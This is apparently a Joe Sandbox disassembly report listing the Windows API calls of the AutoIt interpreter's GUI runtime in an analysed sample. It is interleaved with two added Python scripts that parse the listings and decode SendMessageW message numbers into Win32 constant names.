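"""Parse the per-function "APIs" entries of a Joe Sandbox disassembly
listing into structured records (added example, not Joe Sandbox code).

Line shapes handled, as they appear in the report:
    • Api.MODULE(arg,arg,...), ref: ADDR
    • Api.MODULE ref: ADDR
      • Part of subcall function ADDR: Api.MODULE(...), ref: ADDR
"""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

# Sample input copied verbatim from the report's function entries above
# (the 008F785B..008F7D7A picture loader plus two subcall lines of 0090A8CA).
SAMPLE = """\
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7A9D
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7AB0
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7ABB
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7AD3
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 008F7B00
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00912CAC,00000000), ref: 008F7B16
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7A35
• DestroyWindow.USER32 ref: 008F787B
  • Part of subcall function 0090A8CA: GetSysColor.USER32(00000012), ref: 0090A903
  • Part of subcall function 0090A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0090A953
"""

LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w$]+)\.(?P<mod>[A-Za-z0-9_]+)"   # unresolved imports show as hex names, e.g. 6F550200.COMCTL32
    r"(?:\((?P<args>[^)]*)\))?"                  # argument list is optional in the report
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple[str, ...]
    ref: int               # code address of the call site
    subcall: int | None    # callee address when the line is a "Part of subcall" entry


def parse_api_lines(text: str) -> list[ApiCall]:
    """Return one ApiCall per matching bullet line; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = tuple(raw_args.split(",")) if raw_args else ()
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def classify_arg(arg: str) -> str:
    """'?' is unresolved, an 8-hex-digit token is treated as an immediate
    (assumption about the rendering), anything else as a string literal."""
    if arg == "?":
        return "unknown"
    if re.fullmatch(r"[0-9A-F]{8}", arg):
        return "imm"
    return "str"


def module_histogram(calls: list[ApiCall]) -> Counter:
    """Count call sites per imported module (KERNEL32, USER32, ...)."""
    return Counter(c.module for c in calls)


def string_args(calls: list[ApiCall]) -> list[str]:
    """String literals passed as arguments, e.g. the 'AutoIt v3' window title."""
    return [a for c in calls for a in c.args if classify_arg(a) == "str"]


def find_sequence(calls: list[ApiCall], names: list[str]) -> bool:
    """True if every API in `names` occurs in that order by ascending call
    address among the function's own calls (subcall lines excluded)."""
    order = [c.api for c in sorted(calls, key=lambda c: c.ref) if c.subcall is None]
    pos = 0
    for api in order:
        if pos < len(names) and api == names[pos]:
            pos += 1
    return pos == len(names)


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    print(module_histogram(parsed))
    print("string args:", string_args(parsed))
    print("file -> picture chain:",
          find_sequence(parsed, ["CreateFileW", "ReadFile", "OleLoadPicture"]))
```

Run over the whole listing, `string_args` collects the window class names and directive strings that identify the AutoIt runtime, and `find_sequence` lets you assert a specific call chain (here the file-read-into-OleLoadPicture splash loader) rather than eyeballing addresses.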
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                    • API String ID: 1038674560-86951937
                                    • Opcode ID: 387633a2b62fb872e13f7217007449b56139cb68a86679e39cc6532fa684dd87
                                    • Instruction ID: 448f9e762dfe6a9a3a33628bc30e0677e11b57c19c0f7bdbb84a7162015acdee
                                    • Opcode Fuzzy Hash: 387633a2b62fb872e13f7217007449b56139cb68a86679e39cc6532fa684dd87
                                    • Instruction Fuzzy Hash: F38105B06002196BDB21BB68EC43FEB37A8FF15704F040025F905EA6D2FB60DA61D762
                                    APIs
                                    • DestroyWindow.USER32(?,?,?), ref: 00882CA2
                                    • DeleteObject.GDI32(00000000), ref: 00882CE8
                                    • DeleteObject.GDI32(00000000), ref: 00882CF3
                                    • DestroyCursor.USER32(00000000), ref: 00882CFE
                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00882D09
                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 008BC43B
                                    • 6F550200.COMCTL32(?,000000FF,?), ref: 008BC474
                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 008BC89D
                                      • Part of subcall function 00881B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00882036,?,00000000,?,?,?,?,008816CB,00000000,?), ref: 00881B9A
                                    • SendMessageW.USER32(?,00001053), ref: 008BC8DA
                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 008BC8F1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: DestroyMessageSendWindow$DeleteObject$CursorF550200InvalidateMoveRect
                                    • String ID: 0
                                    • API String ID: 2586706302-4108050209
                                    • Opcode ID: ce0c64806533b1edf882df529653331f9d3b00b15a92b4937460867127e14bcd
                                    • Instruction ID: 80a4c2c3eef13fd9367f9ce48684c8463131a532868afafc7757b3e71b3ce7d0
                                    • Opcode Fuzzy Hash: ce0c64806533b1edf882df529653331f9d3b00b15a92b4937460867127e14bcd
                                    • Instruction Fuzzy Hash: B3129D30604201EFDB21DF28C994BB9BBE5FF05304F5445A9F896CB662CB31E942DBA1
                                    APIs
                                    • GetSysColor.USER32(00000012), ref: 0090A903
                                    • SetTextColor.GDI32(?,?), ref: 0090A907
                                    • GetSysColorBrush.USER32(0000000F), ref: 0090A91D
                                    • GetSysColor.USER32(0000000F), ref: 0090A928
                                    • CreateSolidBrush.GDI32(?), ref: 0090A92D
                                    • GetSysColor.USER32(00000011), ref: 0090A945
                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0090A953
                                    • SelectObject.GDI32(?,00000000), ref: 0090A964
                                    • SetBkColor.GDI32(?,00000000), ref: 0090A96D
                                    • SelectObject.GDI32(?,?), ref: 0090A97A
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0090A999
                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0090A9B0
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0090A9C5
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0090A9ED
                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0090AA14
                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0090AA32
                                    • DrawFocusRect.USER32(?,?), ref: 0090AA3D
                                    • GetSysColor.USER32(00000011), ref: 0090AA4B
                                    • SetTextColor.GDI32(?,00000000), ref: 0090AA53
                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0090AA67
                                    • SelectObject.GDI32(?,0090A5FA), ref: 0090AA7E
                                    • DeleteObject.GDI32(?), ref: 0090AA89
                                    • SelectObject.GDI32(?,?), ref: 0090AA8F
                                    • DeleteObject.GDI32(?), ref: 0090AA94
                                    • SetTextColor.GDI32(?,?), ref: 0090AA9A
                                    • SetBkColor.GDI32(?,?), ref: 0090AAA4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 1996641542-0
                                    • Opcode ID: d4891b11005452285da268d2003bb177264fca95fe414fbe680378ce3d2328f4
                                    • Instruction ID: c6e85e54003e13b8d98f4b95df6bb603714eda8bec4563db68190d6f676869ba
                                    • Opcode Fuzzy Hash: d4891b11005452285da268d2003bb177264fca95fe414fbe680378ce3d2328f4
                                    • Instruction Fuzzy Hash: F8513B71914208EFDF209FA4DC48EAE7BB9EF09320F114625F911AB2A1D7759A40EF90
                                    APIs
                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00908AC1
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00908AD2
                                    • CharNextW.USER32(0000014E), ref: 00908B01
                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00908B42
                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00908B58
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00908B69
                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00908B86
                                    • SetWindowTextW.USER32(?,0000014E), ref: 00908BD8
                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00908BEE
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00908C1F
                                    • _memset.LIBCMT ref: 00908C44
                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00908C8D
                                    • _memset.LIBCMT ref: 00908CEC
                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00908D16
                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00908D6E
                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00908E1B
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00908E3D
                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00908E87
                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00908EB4
                                    • DrawMenuBar.USER32(?), ref: 00908EC3
                                    • SetWindowTextW.USER32(?,0000014E), ref: 00908EEB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                    • String ID: 0
                                    • API String ID: 1073566785-4108050209
                                    • Opcode ID: f1c92f709f0c1c128793396472cf44dd48a29f48380cf122413565097117fb08
                                    • Instruction ID: 253cc38bf1e2563293b17b88dc7196e5e9889e90f2999908ec0ffb1ac93c93b9
                                    • Opcode Fuzzy Hash: f1c92f709f0c1c128793396472cf44dd48a29f48380cf122413565097117fb08
                                    • Instruction Fuzzy Hash: 69E18D71A04219AFDF209F64CC84EEF7BB9EF09710F008156F995AA2D1DB748A81DF60
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 009049CA
                                    • GetDesktopWindow.USER32 ref: 009049DF
                                    • GetWindowRect.USER32(00000000), ref: 009049E6
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00904A48
                                    • DestroyWindow.USER32(?), ref: 00904A74
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00904A9D
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00904ABB
                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00904AE1
                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00904AF6
                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00904B09
                                    • IsWindowVisible.USER32(?), ref: 00904B29
                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00904B44
                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00904B58
                                    • GetWindowRect.USER32(?,?), ref: 00904B70
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00904B96
                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00904BB0
                                    • CopyRect.USER32(?,?), ref: 00904BC7
                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00904C32
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                    • String ID: ($0$tooltips_class32
                                    • API String ID: 698492251-4156429822
                                    • Opcode ID: 134ee38f7a549c33acbac206714524b63084921e23b80197021aab303458f999
                                    • Instruction ID: 3a9ce9c2896134cda94d8aedf43a4f3fd1b234f335471a076b4cc8a07490c939
                                    • Opcode Fuzzy Hash: 134ee38f7a549c33acbac206714524b63084921e23b80197021aab303458f999
                                    • Instruction Fuzzy Hash: 2BB19DB1608341AFDB04DF64C844B6ABBE8FF88714F008A1CF6999B2A1D771ED05CB56
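The SendMessageW entries in these listings carry only raw message numbers, which is what an analyst has to read to tell what a function does with a control. The script below is an added example written for this page and is not part of the Joe Sandbox report or of the sample; it parses call lines in the report's own format ("Name.MODULE(args), ref: addr", with or without the "Part of subcall function" prefix) and resolves the second SendMessageW argument through a hand-built table of Win32 constants from winuser.h and commctrl.h. The regular expression and the table are assumptions about the listing format and are limited to the messages seen on this page; anything else comes back as hex. The sample input is copied from the tooltip function listed directly above. Decoded, that function creates a tooltips_class32 window and drives it with TTM_ADDTOOLW, TTM_UPDATETIPTEXTW, TTM_TRACKPOSITION and TTM_TRACKACTIVATE, which together with the "AutoIt v3 GUI" window class and the "#include"/"#requireadmin" directive strings elsewhere in this section identifies this code as the embedded AutoIt3 interpreter's GUI runtime rather than the script's own logic.

```python
"""Decode Win32 messages in a Joe Sandbox function API listing (added example)."""
import re
from collections import Counter

# Message constants from the Win32 SDK (winuser.h, commctrl.h). Hand-maintained
# assumption: only the values seen in this report section are covered.
WM_NAMES = {
    0x000E: "WM_GETTEXTLENGTH",
    0x0030: "WM_SETFONT",
    0x00B1: "EM_SETSEL",
    0x00C2: "EM_REPLACESEL",
    0x014B: "CB_RESETCONTENT",
    0x014E: "CB_SETCURSEL",
    0x0158: "CB_FINDSTRINGEXACT",
    0x0411: "TTM_TRACKACTIVATE",
    0x0412: "TTM_TRACKPOSITION",
    0x0418: "TTM_SETMAXTIPWIDTH",
    0x041D: "TTM_UPDATE",
    0x0421: "TTM_SETTITLEW",
    0x0432: "TTM_ADDTOOLW",
    0x0433: "TTM_DELTOOLW",
    0x0439: "TTM_UPDATETIPTEXTW",
    0x1002: "LVM_GETIMAGELIST",
    0x1008: "LVM_DELETEITEM",
    0x1053: "LVM_FINDITEMW",
    0x1060: "LVM_SETCOLUMNW",
    0x1074: "LVM_SETITEMTEXTW",
    0x1308: "TCM_DELETEITEM",
    0x133D: "TCM_SETITEMW",
}

# Assumed shape of one call line in the report:
#   • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00904B44
#   • GetDesktopWindow.USER32 ref: 009049DF
#   • Part of subcall function 00881B41: InvalidateRect.USER32(...), ref: 00881B9A
CALL_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

MESSAGE_APIS = {"SendMessageW", "SendMessageA", "SendMessageTimeoutW", "PostMessageW"}


def parse_call(line):
    """Return {api, module, args, ref} for a call line, or None if it is not one."""
    m = CALL_RE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    return {"api": m["api"], "module": m["module"], "args": args, "ref": int(m["ref"], 16)}


def decode_message(call):
    """Name the message (second argument) of a SendMessage-style call; None otherwise."""
    if call["api"] not in MESSAGE_APIS:
        return None
    if len(call["args"]) < 2:
        return "unknown"
    try:
        msg = int(call["args"][1], 16)
    except ValueError:          # '?' means the sandbox could not recover the value
        return "unknown"
    return WM_NAMES.get(msg, f"0x{msg:04X}")


def summarize(listing):
    """Count APIs per module and list decoded messages as (ref, api, name) tuples."""
    apis = Counter()
    messages = []
    for line in listing.splitlines():
        call = parse_call(line)
        if call is None:
            continue
        apis[f'{call["api"]}.{call["module"]}'] += 1
        name = decode_message(call)
        if name is not None:
            messages.append((call["ref"], call["api"], name))
    return apis, messages


# Sample input copied from the tooltip function listing in the report above.
SAMPLE = """
• GetCursorPos.USER32(?), ref: 009049CA
• GetDesktopWindow.USER32 ref: 009049DF
• GetWindowRect.USER32(00000000), ref: 009049E6
• DestroyWindow.USER32(?), ref: 00904A74
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00904A9D
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00904ABB
• SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00904AE1
• SendMessageW.USER32(?,00000421,?,?), ref: 00904AF6
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00904B09
• IsWindowVisible.USER32(?), ref: 00904B29
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00904B44
• SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00904B58
• GetWindowRect.USER32(?,?), ref: 00904B70
• SendMessageW.USER32(?,00000412,00000000), ref: 00904C32
"""

if __name__ == "__main__":
    counts, decoded = summarize(SAMPLE)
    for api, n in counts.most_common():
        print(f"{n:3d}  {api}")
    for ref, api, name in decoded:
        print(f"{ref:08X}  {api} -> {name}")
```

Running it on the sample prints seven SendMessageW calls resolved to the TTM_* tooltip messages; feeding it the whole section lets you list, per function, which controls the interpreter touches (list views, tab controls, combo boxes, edit controls) before spending time on code that is part of the runtime.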
                                    APIs
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008828BC
                                    • GetSystemMetrics.USER32(00000007), ref: 008828C4
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008828EF
                                    • GetSystemMetrics.USER32(00000008), ref: 008828F7
                                    • GetSystemMetrics.USER32(00000004), ref: 0088291C
                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00882939
                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00882949
                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0088297C
                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00882990
                                    • GetClientRect.USER32(00000000,000000FF), ref: 008829AE
                                    • GetStockObject.GDI32(00000011), ref: 008829CA
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 008829D5
                                      • Part of subcall function 00882344: GetCursorPos.USER32(?), ref: 00882357
                                      • Part of subcall function 00882344: ScreenToClient.USER32(009457B0,?), ref: 00882374
                                      • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000001), ref: 00882399
                                      • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000002), ref: 008823A7
                                    • SetTimer.USER32(00000000,00000000,00000028,00881256), ref: 008829FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                    • String ID: AutoIt v3 GUI
                                    • API String ID: 1458621304-248962490
                                    • Opcode ID: d5ac5cc4b3e02061d4f09be7c49cb367f6e9a852b6ad8a66f1a34510ed180013
                                    • Instruction ID: 7426e4c51f01db3961219d706ea1734e0a65bb5031d0cbc49150d47a206e8561
                                    • Opcode Fuzzy Hash: d5ac5cc4b3e02061d4f09be7c49cb367f6e9a852b6ad8a66f1a34510ed180013
                                    • Instruction Fuzzy Hash: 1DB19E71A1020AEFDB24EFA8DC55FAE7BB4FB08314F104129FA15E72A0DB74A941DB50
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000100), ref: 008DA47A
                                    • __swprintf.LIBCMT ref: 008DA51B
                                    • _wcscmp.LIBCMT ref: 008DA52E
                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 008DA583
                                    • _wcscmp.LIBCMT ref: 008DA5BF
                                    • GetClassNameW.USER32(?,?,00000400), ref: 008DA5F6
                                    • GetDlgCtrlID.USER32(?), ref: 008DA648
                                    • GetWindowRect.USER32(?,?), ref: 008DA67E
                                    • GetParent.USER32(?), ref: 008DA69C
                                    • ScreenToClient.USER32(00000000), ref: 008DA6A3
                                    • GetClassNameW.USER32(?,?,00000100), ref: 008DA71D
                                    • _wcscmp.LIBCMT ref: 008DA731
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 008DA757
                                    • _wcscmp.LIBCMT ref: 008DA76B
                                      • Part of subcall function 008A362C: _iswctype.LIBCMT ref: 008A3634
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                    • String ID: %s%u
                                    • API String ID: 3744389584-679674701
                                    • Opcode ID: 1ee29e932c5a8df0ae21fded329ff7d510d307983b188377a4ed6aaf5d99ba07
                                    • Instruction ID: d2d3f330db191583d9bbb630c708bc69d45f8f3e49d32ed93fe67c1af36856e3
                                    • Opcode Fuzzy Hash: 1ee29e932c5a8df0ae21fded329ff7d510d307983b188377a4ed6aaf5d99ba07
                                    • Instruction Fuzzy Hash: C1A1D771204706EFD718DF64C884FAAB7E8FF54314F24462AF999D2250DB30EA55CB92
                                    APIs
                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 008DAF18
                                    • _wcscmp.LIBCMT ref: 008DAF29
                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 008DAF51
                                    • CharUpperBuffW.USER32(?,00000000), ref: 008DAF6E
                                    • _wcscmp.LIBCMT ref: 008DAF8C
                                    • _wcsstr.LIBCMT ref: 008DAF9D
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 008DAFD5
                                    • _wcscmp.LIBCMT ref: 008DAFE5
                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 008DB00C
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 008DB055
                                    • _wcscmp.LIBCMT ref: 008DB065
                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 008DB08D
                                    • GetWindowRect.USER32(00000004,?), ref: 008DB0F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
